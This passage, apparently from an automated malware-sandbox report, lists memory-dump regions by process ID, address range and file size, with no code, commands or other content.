                                                                                                                                                                                                                      • memory/1648-320-0x000000001CF90000-0x000000001CF91000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/1648-318-0x000000001C890000-0x000000001C891000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/1648-276-0x000000001BD60000-0x000000001BD62000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                      • memory/1676-280-0x0000000001170000-0x0000000001172000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                      • memory/1704-238-0x0000000002D90000-0x0000000002DC0000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        192KB

                                                                                                                                                                                                                      • memory/1704-200-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/2136-271-0x0000000000350000-0x0000000000351000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/2136-263-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/2136-283-0x0000000002440000-0x0000000002442000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                      • memory/2236-461-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/2236-470-0x0000000000700000-0x0000000000701000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/2260-580-0x0000000002970000-0x0000000002990000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                      • memory/2260-573-0x0000000140000000-0x0000000140763000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        7.4MB

                                                                                                                                                                                                                      • memory/2260-581-0x0000000002990000-0x00000000029B0000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                      • memory/2392-393-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/3036-166-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/3060-167-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/3220-169-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/3224-205-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/3524-171-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/3540-177-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/3576-224-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/3700-476-0x0000000000C92000-0x0000000000C94000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                      • memory/3700-482-0x0000000000C95000-0x0000000000C97000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                      • memory/3700-467-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/3700-480-0x0000000000C94000-0x0000000000C95000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/3700-473-0x0000000000C90000-0x0000000000C92000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                      • memory/3772-181-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/3776-377-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/3812-146-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/3868-240-0x0000000004740000-0x0000000004788000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        288KB

                                                                                                                                                                                                                      • memory/3868-204-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/3920-244-0x0000000000300000-0x0000000000301000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/3920-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/3988-218-0x0000000000400000-0x000000000046D000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        436KB

                                                                                                                                                                                                                      • memory/3988-206-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/4020-253-0x0000000000270000-0x0000000000271000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4020-250-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/4020-481-0x0000000000B10000-0x0000000000B12000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                      • memory/4120-404-0x0000000004920000-0x0000000004921000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4120-371-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/4208-469-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/4208-477-0x0000000000DF4000-0x0000000000DF5000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4208-489-0x0000000000DF5000-0x0000000000DF6000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4208-484-0x0000000000DF6000-0x0000000000DF7000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4208-472-0x0000000000DF0000-0x0000000000DF2000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                      • memory/4280-465-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/4280-471-0x0000000000F40000-0x0000000000F42000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                      • memory/4528-486-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/4528-568-0x00000000027E0000-0x00000000027E2000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                      • memory/4552-179-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/4680-390-0x0000000005780000-0x0000000005781000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4680-359-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/4720-483-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/4924-209-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/4924-232-0x000000001B8C0000-0x000000001B8C2000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                      • memory/4924-230-0x0000000001300000-0x0000000001301000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4924-227-0x00000000010D0000-0x00000000010D1000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4924-220-0x0000000000B00000-0x0000000000B01000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4924-228-0x00000000012E0000-0x00000000012FA000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        104KB

                                                                                                                                                                                                                      • memory/4944-175-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/5108-165-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        152KB

                                                                                                                                                                                                                      • memory/5108-149-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/5108-164-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        1.5MB

                                                                                                                                                                                                                      • memory/5108-185-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        100KB

                                                                                                                                                                                                                      • memory/5108-163-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        572KB

                                                                                                                                                                                                                      • memory/5108-188-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        100KB

                                                                                                                                                                                                                      • memory/5108-194-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        100KB

                                                                                                                                                                                                                      • memory/5108-192-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        100KB

                                                                                                                                                                                                                      • memory/5148-346-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/5148-366-0x00000000021B0000-0x00000000021B1000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/5228-275-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/5228-382-0x0000000002DD0000-0x0000000002DFF000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        188KB

                                                                                                                                                                                                                      • memory/5316-304-0x0000000004AB0000-0x0000000005056000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        5.6MB

                                                                                                                                                                                                                      • memory/5316-296-0x0000000004CE0000-0x0000000004CE1000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/5316-330-0x0000000004A90000-0x0000000004A93000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        12KB

                                                                                                                                                                                                                      • memory/5316-290-0x00000000000E0000-0x00000000000E1000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/5316-282-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/5316-307-0x0000000004B20000-0x0000000004B38000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        96KB

                                                                                                                                                                                                                      • memory/5332-284-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/5332-427-0x0000000004860000-0x0000000004890000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        192KB

                                                                                                                                                                                                                      • memory/5432-435-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/5464-305-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        80KB

                                                                                                                                                                                                                      • memory/5464-292-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/5496-323-0x0000000005660000-0x000000000567B000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        108KB

                                                                                                                                                                                                                      • memory/5496-309-0x0000000000D30000-0x0000000000D31000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/5496-339-0x00000000057F0000-0x00000000057F1000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/5496-294-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/5512-547-0x0000000003590000-0x0000000003661000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        836KB

                                                                                                                                                                                                                      • memory/5660-306-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/5660-338-0x0000000000C00000-0x0000000000C1E000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        120KB

                                                                                                                                                                                                                      • memory/5660-358-0x000000001B2D0000-0x000000001B2D2000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                      • memory/5660-322-0x0000000000550000-0x0000000000551000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/5728-313-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/5728-335-0x00000000020A0000-0x00000000020A1000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/5760-312-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/5792-360-0x0000000004CD0000-0x0000000004CD1000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/5792-319-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/5852-325-0x0000000000400000-0x0000000000422000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        136KB

                                                                                                                                                                                                                      • memory/5852-336-0x0000000000400000-0x0000000000401000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/5852-321-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/5852-385-0x00000000053D0000-0x00000000059E8000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        6.1MB

                                                                                                                                                                                                                      • memory/5928-326-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/5948-388-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/5952-485-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/5968-329-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/5968-343-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        80KB

                                                                                                                                                                                                                      • memory/6000-342-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/6000-368-0x00000000057D0000-0x0000000005D76000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        5.6MB

                                                                                                                                                                                                                      • memory/6120-493-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/6120-337-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                      • memory/6120-363-0x0000000004F60000-0x00000000051E6000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2.5MB

                                                                                                                                                                                                                      • memory/6192-571-0x000000001CC10000-0x000000001CC12000-memory.dmp
                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                      • memory/6432-496-0x0000000000000000-mapping.dmp